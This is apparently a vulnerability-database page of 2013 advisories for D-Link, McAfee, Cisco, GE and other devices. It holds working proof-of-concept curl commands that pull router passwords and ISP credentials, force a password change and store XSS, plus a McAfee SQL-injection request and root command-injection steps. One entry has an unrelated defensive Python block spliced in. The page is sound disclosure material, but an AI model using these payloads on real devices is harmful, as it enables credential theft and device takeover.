VARIoT IoT vulnerabilities database


VAR-202002-0669 CVE-2013-7054 D-Link DIR-100 Vulnerable to cross-site scripting CVSS V2: 4.3
CVSS V3: 6.1
Severity: MEDIUM
D-Link DIR-100 contains a cross-site scripting vulnerability. Information may be obtained and information may be altered. The D-Link DIR-100 Ethernet Broadband Router is a broadband router device. It fails to properly filter the input of static IP address tags or scheduling tags, allowing remote attackers to build malicious URIs; a user enticed to open such a URI may have sensitive cookies disclosed, sessions hijacked, or malicious operations performed on the client side. D-Link DIR-100 is prone to the following security vulnerabilities:
1. An authentication-bypass vulnerability
2. Multiple information-disclosure vulnerabilities
3. A cross-site request-forgery vulnerability
4. A cross-site scripting vulnerability
An attacker can exploit these issues to execute HTML and arbitrary script code in the browser of an unsuspecting user in the context of the affected device, steal cookie-based authentication credentials, bypass the authentication mechanism, and gain access to potentially sensitive information. Other attacks are also possible.
* Title: Router D-Link DIR-100 Multiple Vulnerabilities
* Date: 2013-12-18
* Author: Felix Richter
* Contact: root@euer.krebsco.de
* Vulnerable Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
* Patched Software: ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
* Report Version: 2.0
* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
* Vulnerable: D-Link DIR-100
* Hardware Revision: D1
* Software Version: 4.03B07 (from 2012-04-10)
* CVE Numbers:
  * CWE-287 Authentication Issues: CVE-2013-7051
  * CWE-255 Issues with Credential Management: CVE-2013-7052
  * CWE-352 Cross-Site Request Forgery: CVE-2013-7053
  * CWE-79 Cross-Site Scripting: CVE-2013-7054
  * CWE-200 Information Disclosure: CVE-2013-7055
* Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
* State: Patched by Vendor
* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8

# Table of Contents

1. Background
2. Technical Description
4. Severity and Remediation
5. Timeline

# 1. Background

The DIR-100 is designed for easy and robust connectivity among heterogeneous standards-based network devices. Computers can communicate directly with this router for automatic opening and closing of UDP/TCP ports to take full advantage of the security provided without sacrificing functionality of on-line applications.

# 2 Vulnerability Description

Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet Broadband Router Revision D (and potentially other devices sharing the affected firmware) that could allow a remote attacker to:

- Retrieve the administrator password without authentication, leading to authentication bypass [CWE-255]
- Retrieve sensitive configuration parameters like the PPPoE username and password without authentication [CWE-200]
- Execute privileged commands without authentication through a race condition, leading to weak authentication enforcement [CWE-287]
- Send a formatted request to a victim which will then execute arbitrary commands on the device (CSRF) [CWE-352]
- Store arbitrary JavaScript code which will be executed when a victim accesses the administrator interface [CWE-79]

CVE numbers for these vulnerabilities have not yet been assigned.

# 3 Technical Description of the Vulnerabilities

## 3.0 The DIR-100 Web Interface and CGI

The DIR-100 web interface provides a CGI script on `/cliget.cgi` for unauthenticated users and `/cli.cgi` for authenticated requests. The list of features provided by each CGI script can be retrieved by:

    curl 'http://192.168.1.104/cliget.cgi?cmd=help'
    # and respectively when authenticated
    curl 'http://192.168.1.104/cli.cgi?cmd=help'

## 3.1 Authentication Bypass

### Description

The administrator password is not protected in any way on the device and is available to every attacker with access to the administrator interface, which listens on port 80. The request that retrieves the administrator password does not need to be authenticated.

### Proof of Concept

The web interface provides two distinct ways to retrieve the administrator password:

    curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
    curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'

## 3.2 Weak Authentication

### Description

As soon as a user is logged into the administration interface, the cli CGI is `unlocked` and can be used without authenticating first, as the CGI script does not check any other authentication parameters such as cookies or HTTP parameters. The only access check is whether the IP address is the same.

### Proof of Concept

    # open the router interface in a web browser and log in
    firefox 'http://192.168.0.1/'
    # open a new terminal or another web-browser which is currently not logged
    # in and try to access
    curl 'http://192.168.0.1/cli.cgi?cmd=help'
    # this request will be authenticated and it will not be redirected to the
    # login page. If no user is logged in, the request will be redirected to
    # the login

## 3.3 Retrieve sensitive information

### Description

Besides retrieving the administrator password without authentication, it is possible to retrieve other sensitive configuration from the device as well, like the PPTP and PPPoE username and password, the configured DynDNS username and password, and the configured mail log credentials, when these parameters are configured. No authentication is required.

### Proof of Concept

    curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_user'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$pptp_pass'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_user'
    curl 'http://192.168.0.1/cliget.cgi?cmd=$log_mail_pwd'

## 3.4 Cross-Site Request Forgery (CSRF)

### Description

CSRF attacks can be launched by sending a formatted request to a victim, then tricking the victim into loading the request (often automatically), which makes it appear that the request came from the victim. As an example, the attacker could change the administrator password (see Proof of Concept code) and enable system remote access.

### Proof of Concept

Changing the password for administrator can be done when the IP address is authenticated:

    # Log into DIR-100
    curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
    # Change password
    curl 'http://192.168.0.1/cli.cgi?cmd=$sys_user1=user=admin&pass=c%;$sys_passHash=4%25;commit'
    # enable remote console
    curl 'http://192.168.0.1/cli.cgi?cmd=$sys_remote_enable=1%25;$sys_remote_ip=0.0.0.0%25;$sys_remote_port=80%25;commit'

## 3.5 Cross-Site Scripting (XSS)

### Description

It is possible for an authenticated user to store information on the server which will not be checked on the server side for special characters, which results in persistent cross-site scripting vulnerabilities. With this vulnerability the victim (administrator) will run JavaScript code in the context of the D-Link DIR-100. XSS is possible because the input is filtered and validated only on the client side (in JavaScript code); data can be sent directly to the CGI scripts.

### Proof of Concept

    # Log into DIR-100
    curl -X POST -d 'uname=admin&pws=password&login=Login' 'http://192.168.0.1/login.htm'
    # XSS in Static IP Address Tab
    curl 'http://192.168.1.104/cli.cgi?cmd=dhcps%20set%20name=<script>alert(1)</script>%26ip=192.168.0.199%26mac=00:11:22:33:44:55%26flg=1%26exp='
    # XSS in Scheduler tab
    curl 'http://192.168.1.104/cli.cgi?cmd=$sched2=schen=1%26time=0-60%26day=5%26desc=<script>alert(1)</script>%26use=0%26idx=2%26;commit'

# 4 Severity and Remediation

These exploits are considered very critical, especially when the feature of remote administration is activated on the system. Weak authentication, together with cross-site request forgery and authentication bypass, can result in a full device compromise from an arbitrary website the victim is accessing, even if the device has remote administration deactivated on the internet port. It is recommended to upgrade the router with the newest firmware of the D-Link DIR-100.

# 5 Timeline

2013-09-13 - First contact with D-Link support
2013-09-19 - Sent report
2013-10-14 - Requested status update; response: beta will be available mid October
2013-12-02 - Vendor publishes firmware update
2013-12-11 - Requested CVE IDs
2013-12-18 - Publish the report
VAR-201312-0506 No CVE GE Proficy HMI/SCADA-iFIX 'TCPTASK.exe' Remote Buffer Overflow Vulnerability CVSS V2: 7.5
CVSS V3: -
Severity: HIGH
GE Intelligent Platforms Proficy HMI/SCADA–iFIX is the world's leading industrial automation software solution that provides process visualization, data acquisition and data monitoring for production operations. GE Proficy HMI/SCADA-iFIX 4.5, 5.0, 5.1 has a remote buffer overflow vulnerability in the implementation of the TCP/IP task process (TCPTASK.exe). Successful exploitation allows an attacker to execute arbitrary code in the context of the affected application.
VAR-201312-0504 No CVE GE Proficy HMI/SCADA-iFIX Unsafe Default Password Vulnerability CVSS V2: 6.8
CVSS V3: -
Severity: MEDIUM
GE Intelligent Platforms Proficy HMI/SCADA–iFIX is the world's leading industrial automation software solution that provides process visualization, data acquisition and data monitoring for production operations. GE Proficy HMI/SCADA-iFIX 7.19i and 7.44a have an unsafe default password vulnerability in their implementation. A remote attacker who knows the default credentials set during the installation process can exploit this vulnerability to gain unauthorized access to a device.
VAR-201312-0502 No CVE GE Proficy HMI/SCADA-iFIX 'TCPTASK.exe' Remote Denial of Service Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
GE Intelligent Platforms Proficy HMI/SCADA–iFIX is the world's leading industrial automation software solution that provides process visualization, data acquisition and data monitoring for production operations. GE Proficy HMI/SCADA-iFIX 5.0, 5.1, 5.5 has a remote buffer overflow vulnerability in the implementation of the TCP/IP task process (TCPTASK.exe). A remote attacker can exploit this vulnerability by sending a specially crafted TCP/IP message, resulting in a denial of service.
VAR-201312-0549 No CVE TP-Link TL-WR740N/TL-WR740ND Wireless N Router HTTP Processing Denial of Service Vulnerability CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
The TP-Link TL-WR740N/TL-WR740ND Wireless N router HTTP service fails to properly handle user-submitted requests, allowing remote attackers to send specially crafted requests that crash the server, causing a denial of service. TP-LINK TL-WR740N and TL-WR740ND are wireless router products of the Chinese company TP-LINK. A denial of service vulnerability exists in TP-LINK TL-WR740N / TL-WR740ND using 3.12.11 Build 120320 Rel.51047n firmware. An attacker could use this vulnerability to crash an affected device and cause a denial of service. TP-Link TL-WR740N/TL-WR740ND are prone to a denial-of-service vulnerability.
VAR-201312-0316 CVE-2013-7103 McAfee Email Gateway Vulnerable to arbitrary command execution CVSS V2: 9.0
CVSS V3: -
Severity: HIGH
McAfee Email Gateway 7.6 allows remote authenticated administrators to execute arbitrary commands via shell metacharacters in the value attribute in a (1) TestFile XML element or the (2) hostname. NOTE: this issue can be combined with CVE-2013-7092 to allow remote attackers to execute commands. McAfee Email and Web Security Appliance and Email Gateway are prone to multiple SQL-injection and remote command-execution vulnerabilities because they fail to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to execute arbitrary commands, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The solution offers incoming threat protection, outgoing encryption, data loss prevention, and more.

McAfee Email Gateway 7.6 multiple vulnerabilities

http://www.mcafee.com/us/products/email-gateway.aspx -- Has free trial

Many instances of SQL injection were found as an unprivileged read-only authenticated user that allow the user to completely take over the accounts of other users by using a stacked injection technique to run UPDATE statements. Other techniques available are error-based, time-based, and boolean-based injections.

Several remote command execution vulnerabilities were found as an administrator which are run as the local root user. By utilising the SQL injections as an unprivileged user, a user can escalate privileges by updating the password hash of an admin, and ultimately run commands on the server as root.

However, no data seems to be able to be exfiltrated via the command injections. You may receive a connect back, but no commands can be run over the connect-back. My solution to this was to pipe the results of commands into a file in /tmp, then use the SQL injections to read the file from the FS and return the results.

---------------------------------------------------

As a read-only user with reporting capabilities, many SQL injection vectors exist when creating new reports based on filters. You can get to this part of the web app by clicking the Reports menu item at the top-center. The following request contains four exploitable SQL injections, each exploitable via a few different techniques:

    POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1
    Host: 172.31.16.87:10443
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: text/plain; charset=UTF-8
    Referer: https://172.31.16.87:10443/admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/html/index.html
    Content-Length: 626
    Cookie: SCMUserSettings=lastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_page_id%3Ddashboard; SHOW_BANNER_NOTICE=BannerShown%3D1; ws_session=SID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86
    Connection: keep-alive
    Pragma: no-cache
    Cache-Control: no-cache

    {"id":"loadreport","locale":"en_US","commands":[{"name":"getDDSData","args":{"what":["events"],"filters":{"filter_period":"week","start_date":"Now","event_type":"ui_events","event_id":"all","reason":"all"},"date_range":"week","events_col":"edate","events_order":"DESC","events_offset":0,"events_nitems":50,"tz":480,"start_date":1385491876.405,"is_mail":false,"itemized_nitems":10,"itemized_offset":0,"emailstatus_nitems":50,"emailstatus_offset":0,"emailstatus_col":"edate","emailstatus_order":"DESC","dig_filters":[],"dig_category":"","dig_summarize":true,"init":true,"type":"ui_events"}}],"filterType":"system","autoconv":1}

Within the above request, the events_col, event_id, reason, events_order, emailstatus_order, and emailstatus_col JSON keys are vulnerable to SQL injection. You can capture the request with burpsuite and alter each value by adding an apostrophe to view the SQL error in the response. You can also use SQLmap to try various techniques for exploitability.

------------------------------------------------------

Many remote command execution vulnerabilities exist for administrator users. Every vector I found was being run as the root user and they all exist within a single request. As an administrator, go to the System tab in the top menu. You will be presented with general server settings. Remove the last letter of the hostname, and replace it back. You will now have a green checkmark in the top right of the web application. Click this, then click OK on the dialog that pops up in the web app. The next captured request will be the request susceptible to command execution. It is a very large request with XML contained in JSON. Because this makes sense.

Within this XML, you may search for any XML element whose "name" attribute contains TestFile. Any of these elements are susceptible to command injection within the "value" attribute. These filenames seem to be passed to a utility like 'test' to ensure whether or not it exists. By using shell metacharacters, you can execute arbitrary commands on the system as root. The hostname within this request is also susceptible to command injection via shell metacharacters.

You may also search for any XML element called Command. Each of these elements contains a small command to be run on a given event. You may alter any of these to be run as root.

You may also search for an XML element called Script. This is used to manage the cron jobs (make sure the corresponding Enabled element is set to "1" instead of "0"). You may alter or create any cron jobs that will be run as root.
-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
VAR-201312-0317 CVE-2013-7104 McAfee Email Gateway Vulnerabilities in arbitrary command execution CVSS V2: 9.0
CVSS V3: -
Severity: HIGH
McAfee Email Gateway 7.6 allows remote authenticated administrators to execute arbitrary commands by specifying them in the value attribute in a (1) Command or (2) Script XML element. NOTE: this issue can be combined with CVE-2013-7092 to allow remote attackers to execute commands. McAfee Email Gateway contains a command execution vulnerability. McAfee Email and Web Security Appliance and Email Gateway are prone to multiple SQL-injection and remote command-execution vulnerabilities because they fail to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to execute arbitrary commands, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The solution offers incoming threat protection, outgoing encryption, data loss prevention, and more. (The advisory text for this issue, "McAfee Email Gateway 7.6 multiple vulnerabilities", is the same as the one reproduced under VAR-201312-0316 above.)
<http://www.mcafee.com/us/products/email-gateway.aspx> -- Has free trial Many instances of SQL injection were found as an unprivileged read-only authenticated user that allow the user to completely take over the accounts of other users by using a stacked injection technique to run UPDATE statements. Other techniques available are error-based, time-based, and boolean-based injections. Several remote command execution vulnerabilities were found as an administrator which are run as the local root user. By utilising the SQL injections as an unprivileged user, a user can escalate privileges by updating the password hash of an admin, and ultimately run commands on the server as root. However, no data seems to be able to be exfiltrated via the command injections. You may receive a connect back, but no commands can be run over the connect-back. My solution to this was to pipe the results of commands into a file in /tmp, then use the SQL injections to read the file from the FS and return the results. --------------------------------------------------- As a read-only user with reporting capabilities, many SQL injection vectors exist when creating new reports based on filters. You can get to this part of the web app by clicking the Reports menu item at the top-center. 
The following request contains four exploitable SQL injections each exploitable via a few different techniques: POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1 Host: 172.31.16.87:10443 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0 Accept: text/html,application/xhtml+xml,application/xml;q=3D0.9,*/*;q=3D0.8 Accept-Language: en-US,en;q=3D0.5 Accept-Encoding: gzip, deflate Content-Type: text/plain; charset=3DUTF-8 Referer: https://172.31.16.87:10443/admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/htm= l/index.html Content-Length: 626 Cookie: SCMUserSettings=3DlastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_= page_id%3Ddashboard; SHOW_BANNER_NOTICE=3DBannerShown%3D1; ws_session=3DSID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache {"id":"loadreport","locale":"en_US","commands":[{"name":"getDDSData","args"= :{"what":["events"],"filters":{"filter_period":"week","start_date":"Now","e= vent_type":"ui_events","event_id":"all","reason":"all"},"date_range":"week"= ,"events_col":"edate","events_order":"DESC","events_offset":0,"events_nitem= s":50,"tz":480,"start_date":1385491876.405,"is_mail":false,"itemized_nitems= ":10,"itemized_offset":0,"emailstatus_nitems":50,"emailstatus_offset":0,"em= ailstatus_col":"edate","emailstatus_order":"DESC","dig_filters":[],"dig_cat= egory":"","dig_summarize":true,"init":true,"type":"ui_events"}}],"filterTyp= e":"system","autoconv":1} Within the above request, the events_col, event_id, reason, events_order, emailstatus_order, and emailstatus_col JSON keys are vulnerable to SQL injection. You can capture the request with burpsuite and alter each value by adding an apostrophe to view the SQL error in the response. You can also use SQLmap to try various techniques for exploitability. Every vector I found was being run as the root user and they all exists within a single request. As an administrator, go to the System tab in the top menu. 
You will be presented with general server settings. Remove the last letter of the hostname, and replace it back. You will now have a green checkmark in the top right of the web application. Click this, then click OK on the dialog that pops up in the web app. The next captured request will be the request susceptible to command execution. It is a very large request with XML contained in JSON. Because this makes sense. Within this XML, you may search for any XML element whose =93name=94 attrib= ute contains TestFile. Any of these elements are susceptible to command injection within the =93value=94 attribute. These filenames seems to be pas= sed to a utility like =91test=92 to ensure whether or not it exists. By using s= hell metacharacters, you can execute arbitrary commands on the system as root. The hostname within this request is also susceptible to command injection via shell metacharacters. You may also search for any XML element called Command. Each of these elements contains a small command to be run on a given event. You may alter any of these to be run as root. You may also search for an XML element called Script. This is used to manage the cron jobs (make sure the corresponding Enabled element is set to =931=94 instead of =930=94). You may alter or create any cron jobs that wil= l be run as root. 
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
VAR-201312-0309 CVE-2013-7092 McAfee Email Gateway /admin/cgi-bin/rpc/doReport/18 SQL injection vulnerability CVSS V2: 6.5
CVSS V3: -
Severity: MEDIUM
Multiple SQL injection vulnerabilities in /admin/cgi-bin/rpc/doReport/18 in McAfee Email Gateway 7.6 allow remote authenticated users to execute arbitrary SQL commands via the (1) events_col, (2) event_id, (3) reason, (4) events_order, (5) emailstatus_order, or (6) emailstatus_col JSON keys. Exploiting these issues could allow an attacker to execute arbitrary commands, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. McAfee Email Gateway (MEG) is a suite of email security solutions from McAfee. The solution offers incoming threat protection, outgoing encryption, data loss prevention, and more. A SQL injection vulnerability exists in /admin/cgi-bin/rpc/doReport/18 in MEG version 7.6.

Other techniques available are error-based, time-based, and boolean-based injections.

Several remote command execution vulnerabilities were found as an administrator which are run as the local root user. By utilising the SQL injections as an unprivileged user, a user can escalate privileges by updating the password hash of an admin, and ultimately run commands on the server as root.

However, no data seems to be able to be exfiltrated via the command injections. You may receive a connect back, but no commands can be run over the connect-back. My solution to this was to pipe the results of commands into a file in /tmp, then use the SQL injections to read the file from the FS and return the results.

---------------------------------------------------

As a read-only user with reporting capabilities, many SQL injection vectors exist when creating new reports based on filters. You can get to this part of the web app by clicking the Reports menu item at the top-center.
The following request contains four exploitable SQL injections each exploitable via a few different techniques:

POST /admin/cgi-bin/rpc/doReport/18 HTTP/1.1
Host: 172.31.16.87:10443
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain; charset=UTF-8
Referer: https://172.31.16.87:10443/admin/969bf547d36f6c7e4302952cf72a5ce3/en_US/html/index.html
Content-Length: 626
Cookie: SCMUserSettings=lastUser%3Dusername%26popcheck%3D1%26lang%3Den_US%26last_page_id%3Ddashboard; SHOW_BANNER_NOTICE=BannerShown%3D1; ws_session=SID%3D616BF3CC-DA8B-401D-9220-ACED9A0FCD86
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

{"id":"loadreport","locale":"en_US","commands":[{"name":"getDDSData","args":{"what":["events"],"filters":{"filter_period":"week","start_date":"Now","event_type":"ui_events","event_id":"all","reason":"all"},"date_range":"week","events_col":"edate","events_order":"DESC","events_offset":0,"events_nitems":50,"tz":480,"start_date":1385491876.405,"is_mail":false,"itemized_nitems":10,"itemized_offset":0,"emailstatus_nitems":50,"emailstatus_offset":0,"emailstatus_col":"edate","emailstatus_order":"DESC","dig_filters":[],"dig_category":"","dig_summarize":true,"init":true,"type":"ui_events"}}],"filterType":"system","autoconv":1}

Within the above request, the events_col, event_id, reason, events_order, emailstatus_order, and emailstatus_col JSON keys are vulnerable to SQL injection. You can capture the request with burpsuite and alter each value by adding an apostrophe to view the SQL error in the response. You can also use SQLmap to try various techniques for exploitability.

------------------------------------------------------

Many remote command execution vulnerabilities exist for administrator users.
Every vector I found was being run as the root user and they all exist within a single request. As an administrator, go to the System tab in the top menu. You will be presented with general server settings. Remove the last letter of the hostname, and replace it back. You will now have a green checkmark in the top right of the web application. Click this, then click OK on the dialog that pops up in the web app. The next captured request will be the request susceptible to command execution. It is a very large request with XML contained in JSON. Because this makes sense.

Within this XML, you may search for any XML element whose "name" attribute contains TestFile. Any of these elements are susceptible to command injection within the "value" attribute. These filenames seem to be passed to a utility like 'test' to ensure whether or not it exists. By using shell metacharacters, you can execute arbitrary commands on the system as root.

The hostname within this request is also susceptible to command injection via shell metacharacters.

You may also search for any XML element called Command. Each of these elements contains a small command to be run on a given event. You may alter any of these to be run as root.

You may also search for an XML element called Script. This is used to manage the cron jobs (make sure the corresponding Enabled element is set to "1" instead of "0"). You may alter or create any cron jobs that will be run as root.
--
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
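The server-side counterpart to the doReport/18 request above, as an added example that is not McAfee's code: the four sort keys are SQL identifiers and cannot be bound as parameters, so they are matched against an allowlist, while the filter keys travel as bound parameters. The column names, the allowlists and the in-memory events table are assumptions made for the illustration; the request body is a constructed copy of the one captured in the advisory.

```python
import json
import sqlite3

# Allowlists (assumed for illustration). Sort columns and directions are SQL
# identifiers and cannot be bound as parameters, so the four sort keys named
# in the advisory are checked against these sets before they reach the query.
ALLOWED_COLS = {"edate", "event_id", "reason"}
ALLOWED_ORDER = {"ASC", "DESC"}
SORT_KEYS = {"events_col": ALLOWED_COLS, "events_order": ALLOWED_ORDER,
             "emailstatus_col": ALLOWED_COLS, "emailstatus_order": ALLOWED_ORDER}
# The two injectable filter keys are data; they are bound as parameters.
FILTER_KEYS = ("event_id", "reason")

# The body captured in the advisory (constructed copy, whitespace added).
BENIGN_BODY = json.dumps({
    "id": "loadreport", "locale": "en_US",
    "commands": [{"name": "getDDSData", "args": {
        "what": ["events"],
        "filters": {"filter_period": "week", "start_date": "Now",
                    "event_type": "ui_events", "event_id": "all", "reason": "all"},
        "date_range": "week", "events_col": "edate", "events_order": "DESC",
        "events_offset": 0, "events_nitems": 50, "tz": 480,
        "start_date": 1385491876.405, "is_mail": False,
        "itemized_nitems": 10, "itemized_offset": 0,
        "emailstatus_nitems": 50, "emailstatus_offset": 0,
        "emailstatus_col": "edate", "emailstatus_order": "DESC",
        "dig_filters": [], "dig_category": "", "dig_summarize": True,
        "init": True, "type": "ui_events"}}],
    "filterType": "system", "autoconv": 1})

# The advisory's first check: the same body with an apostrophe appended to a
# sort key. The vulnerable server answered with an SQL error; this handler
# rejects the body before any query is built.
_probe = json.loads(BENIGN_BODY)
_probe["commands"][0]["args"]["events_col"] = "edate'"
PROBE_BODY = json.dumps(_probe)


def validate_report_args(args):
    """Return (key, value) pairs of getDDSData args that fail validation."""
    bad = []
    for key, allowed in SORT_KEYS.items():
        val = args.get(key)
        if not isinstance(val, str) or val not in allowed:
            bad.append((key, val))
    filters = args.get("filters", {})
    for key in FILTER_KEYS:
        val = filters.get(key)
        if not isinstance(val, str) or len(val) > 64:
            bad.append((key, val))
    for key in ("events_nitems", "events_offset"):
        if not isinstance(args.get(key), int) or args[key] < 0:
            bad.append((key, args.get(key)))
    return bad


def report_violations(body_json):
    """Violations for a whole doReport/18 body (first command only)."""
    return validate_report_args(json.loads(body_json)["commands"][0]["args"])


def build_events_query(args):
    """Compose the events query: identifiers come only from the allowlist and
    every user-supplied value travels as a bound parameter."""
    problems = validate_report_args(args)
    if problems:
        raise ValueError(f"rejected report arguments: {problems}")
    f = args["filters"]
    sql = ("SELECT edate, event_id, reason FROM events "
           "WHERE (? = 'all' OR event_id = ?) AND (? = 'all' OR reason = ?) "
           f"ORDER BY {args['events_col']} {args['events_order']} "
           "LIMIT ? OFFSET ?")
    params = (f["event_id"], f["event_id"], f["reason"], f["reason"],
              args["events_nitems"], args["events_offset"])
    return sql, params


def run_report(body_json):
    """Validate the body, then run it against a constructed in-memory events
    table (assumed schema); returns the rows."""
    cmd = json.loads(body_json)["commands"][0]
    if cmd["name"] != "getDDSData":
        raise ValueError("unexpected command")
    sql, params = build_events_query(cmd["args"])
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events(edate INTEGER, event_id TEXT, reason TEXT)")
    conn.executemany("INSERT INTO events VALUES (?, ?, ?)",
                     [(1385491800, "login", "ok"),
                      (1385491850, "login", "bad_password"),
                      (1385491870, "logout", "ok")])
    return conn.execute(sql, params).fetchall()
```

The benign body passes and returns the three rows newest first; the apostrophe probe is rejected at validation, so no SQL error (and no injection) is ever reachable.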
VAR-201312-0068 CVE-2013-2825 Linux-kernel-based Director Industrial Communication Gateway device Outstation component DNP3 service denial of service (DoS) vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
The DNP3 service in the Outstation component on Elecsys Director Gateway devices with kernel 2.6.32.11ael1 and earlier allows remote attackers to cause a denial of service (CPU consumption and communication outage) via crafted input. Elecsys Director Gateway is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause denial-of-service conditions. Elecsys Director Industrial Communication Gateway is an industrial data communication gateway product line from the US company Elecsys. The device provides functions such as data acquisition, automatic communication failover, network security, bandwidth management, protocol conversion, and more.
VAR-201312-0235 CVE-2013-6690 Cisco Prime Collaboration Assurance component web interface cross-site scripting vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Multiple cross-site scripting (XSS) vulnerabilities in the web interface in the Assurance component in Cisco Prime Collaboration allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug IDs CSCui92643, CSCui94038, and CSCui94161. The vendor has confirmed this vulnerability and released it as Bug IDs CSCui92643, CSCui94038 and CSCui94161. Arbitrary web script or HTML may be inserted by a third party. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug IDs CSCui92643, CSCui94038, and CSCui94161. Cisco Prime Collaboration is an enterprise collaboration network management solution from Cisco. It supports simplified unified communications and video collaboration network management through a single management console, and rapid deployment of communication sites. The vulnerability stems from the fact that the page does not adequately sanitize user input. A remote attacker can exploit this vulnerability to inject arbitrary code or HTML and obtain the user's access credentials.
VAR-201312-0452 CVE-2013-6703 Cisco ONS 15454 controller card TLS/SSLv3 module denial of service (DoS) vulnerability CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
The TLS/SSLv3 module on Cisco ONS 15454 controller cards allows remote attackers to cause a denial of service (card reset) via crafted (1) TLS or (2) SSLv3 packets, aka Bug ID CSCuh34787. An attacker can exploit this issue to cause the controller card to reset, denying service to legitimate users. This issue is being tracked by Cisco bug ID CSCuh34787. Cisco ONS 15454 is an optical multi-service transport platform from Cisco. The platform uses optical transport technologies such as Resilient Packet Ring (RPR), SDH, and DWDM/CWDM to integrate Ethernet, IP, storage, and TDM services and deliver next-generation voice and data services. The controller card is one of the platform's control cards. The vulnerability is caused by the program not properly filtering TLS/SSLv3 packets.
VAR-201312-0453 CVE-2013-6704 Cisco IOS XE denial of service (DoS) vulnerability CVSS V2: 7.1
CVSS V3: -
Severity: HIGH
Cisco IOS XE does not properly manage memory for TFTP UDP flows, which allows remote attackers to cause a denial of service (memory consumption) via TFTP (1) client or (2) server traffic, aka Bug IDs CSCuh09324 and CSCty42686. Cisco IOS is the Internetwork Operating System used on most Cisco routers and network switches. A denial of service vulnerability exists in Cisco IOS XE Software. An attacker can exploit the vulnerability to consume excess memory and cause the device to crash, denying service to legitimate users. This issue is being tracked by Cisco Bug IDs CSCuh09324 and CSCty42686. The vulnerability is caused by the program not properly freeing memory.
VAR-201312-0454 CVE-2013-6705 Cisco IOS and IOS XE IP Device Tracking denial of service (DoS) vulnerability CVSS V2: 6.1
CVSS V3: -
Severity: MEDIUM
The IP Device Tracking (IPDT) feature in Cisco IOS and IOS XE allows remote attackers to cause a denial of service (IPDT AVL corruption and device reload) via a crafted sequence of ARP packets, aka Bug ID CSCuh38133. Cisco IOS is the Internetwork Operating System used on most Cisco routers and network switches. The vulnerability is due to IPDT AVL corruption. Sending a specially crafted ARP packet to the affected device can trigger the vulnerability and overload the device. Cisco IOS and IOS XE Software are prone to a remote denial-of-service vulnerability. Successful exploits may allow attackers to cause the device to reload, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCuh38133.
VAR-202002-0670 CVE-2013-7055 D-Link DIR-100 Vulnerable to insufficient protection of credentials CVSS V2: 5.0
CVSS V3: 9.8
Severity: CRITICAL
D-Link DIR-100 4.03B07 has PPTP and poe information disclosure. D-Link DIR-100 contains a vulnerability related to insufficient protection of credentials. Information may be obtained or altered, and a denial of service (DoS) condition may result. D-Link DIR-100 Ethernet Broadband Router is a broadband router device. The D-Link DIR-100 Ethernet Broadband Router fails to properly restrict privileged access, allowing remote attackers to obtain information such as the PPTP, POE, and DynDNS username and password without the request being authenticated. D-Link DIR-100 is prone to the following security vulnerabilities:
1. An authentication-bypass vulnerability
2. Multiple information-disclosure vulnerabilities
3. A cross-site request-forgery vulnerability
4. A cross-site scripting vulnerability
